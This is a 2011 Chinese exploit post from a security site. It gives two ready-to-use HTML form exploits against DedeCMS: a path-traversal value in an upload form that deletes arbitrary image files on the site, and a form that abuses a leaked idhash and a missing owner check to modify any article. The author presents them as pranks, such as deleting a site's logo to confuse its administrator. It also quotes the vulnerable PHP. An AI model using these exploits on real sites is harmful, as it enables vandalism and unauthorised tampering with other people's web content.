首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
DEDECMS恶作剧漏洞&任意修改文章漏洞 EXP
来源:vfocus.net 作者:心灵 发布时间:2011-01-28  
o(∩_∩)o 哈哈    刚拿这个漏洞去玩  现在肚子还在笑
纯属恶作剧    反正很搞笑的漏洞就是了
此漏洞只能当作恶作剧使用 并没什么用处
经典对白看代码
edit_fullinfo.php


EXP:哈哈 这样就能删除网站任何的JPG GIF PNG格式文件  恶作剧就是把LOGO删除了 或者某些广告图片删除 等管理员模糊
这个漏洞不足以得到马儿 但能修改任何文章 也算是一个严重的漏洞!
废话不说
经典对白 看代码!
member\soft_edit.php

 
<form id="frmUpload" enctype="multipart/form-data" action="http://www.hackqing.com/member/edit_space_info.php" method="post" name="spacelogo">
Upload a new file:
<input type="file" name="spacelogo" size="50" id="spacelogo" value="spacelogo">
  <label>
  <input name="dopost" type="text" value="save" />
  </label>
    <label>
  <input name="oldspacelogo" type="text" value="/uploads/userup/111/../../../sb/11.jpg" />
   //uploads/userup/111/   这个路径自己上传一张图片后就能获得  /sb/11.jpg 为要删除图片的路径  这里很简单 不明白的拿块豆腐砸死自己自杀把
  </label>
   <label>
  <input name="spacename" type="text" value="t00ls" />
  </label>
     <label>
  <input name="pagesize" type="text" value="10" />
  </label>
<input id="spacelogo" type="submit" value="Upload" >
</form>

 

 

二:DEDECMS任意修改文章漏洞 附EXP

 

 if(empty($dopost)) //如果这里是空也就是直接访问这个文件

 {

 //读取归档信息

 $arcQuery = "Select

dede_channeltype.typename as channelname,

 dede_arcrank.membername as rankname,

 dede_channeltype.arcsta,

 dede_archives.*

 From dede_archives

 left join dede_channeltype on dede_channeltype.id=dede_archives.channel

 left join dede_arcrank on dede_arcrank.rank=dede_archives.arcrank

 where dede_archives.id='$aid'";

 //悲剧了 没有验证MID信息 AID这里就是文章ID 可以自定义!

$dsql->SetQuery($arcQuery);

 $row = $dsql->GetOne($arcQuery);

 //省略一堆验证代码....

 include(DEDEMEMBER."/templets/soft_edit.htm"); //载入模板[code]

 //再看这个soft_edit.htm 的代码

 //其中一段是

 <input type="hidden" name="idhash" value="<?php echo md5($row['id'].$cfg_cookie_encode); ?>" />
//输出了 idhash 这个很重要
//这样就得到了要修改文章的idhash

//然后用修改文章的文件去利用


看代码archives_edit.php

 if($dopost=='save')

 {

 include(DEDEMEMBER.'/inc/archives_check_edit.php'); //这里是验证idhash

 //省略一堆没用的代码

 $upQuery = "Update `dede_archives` set

 ismake='$ismake',

 arcrank='$arcrank',

 typeid='$typeid',

 title='$title',

litpic='$litpic',

 description='$description',

 keywords='$keywords',

 mtype = '$mtypesid',

 flag='$flag'

 where id='$aid' And mid='$mid'; "; //默认的MID是1 也就是ADMIN管理员 aid就是文章ID


现在看下archives_check_edit.php这个文件

$ckhash = md5($aid.$cfg_cookie_encode);

if($ckhash!=$idhash) //idhash就是这样用的

{

 ShowMsg('校对码错误,你没权限修改此文档或操作不合法!','-1');

 exit();

 }
//这样就成功修改文章了

 

EXP:

  <form method="post" action="http://www.hackqing.com/member/archives_edit.php?dopost=save" enctype="multipart/form-data" id="upload">

 <label>

 <input name="aid" type="text" value="44003" /> //这里是文章ID 自己在plus/view.php里找

 </label>

 <label>

 <input name="mid" type="text" value="1" /> //发布人的MID 默认ADMIN是1

 </label>

 <label>

 <input name="typeid" type="text" value="1" /> // 栏目ID 不知道的就自己新发表一篇然后看源代码找到可以发布的ID

 </label>

<label>

<input name="title" type="text" value="test" /> //文章标题

 </label>

 <label>

<input name="description" type="text" value="test" /> //文章内容

 </label>

 <label>

 <input name="idhash" type="text" value="32bbac95e90baaffad905bb3d44edd9f" /> //idhash 在第一步里说了怎么获取了

 </label>

 <label>

 <input name="vdcode" type="text" value="1" /> //验证码。。新发布文章就能获取

 </label>

 <div></div>

 <input name="respondids" value="确定修改 " class="coolbg np" type="submit">

 </form>

 
 


这样就能任意修改任何文章了..........

 

‍‍

‍作者:‍‍心灵


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·DEDECMS 0DAY
·风神新闻管理静态版1.7漏洞
·UCenter Home 2.0 鸡叻 SQL 注入
·EimsCms v5.0 XSS+CSRF=GetShell
·HDWiKi V 5.0 本地包含0Day
·Exploit Linux Kernel Slub Over
·ecshop支付漏洞最新可用EXP利用
·深圳迪蒙网络科技企业网站管理系
·华夏外挂下载系统2.0漏洞利用
·Diy-Page v8.2 两个注入漏洞分析
·ecshop最新版(v2.72) 本地包含漏
·无忧购物系统ASP时尚版存在后门
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved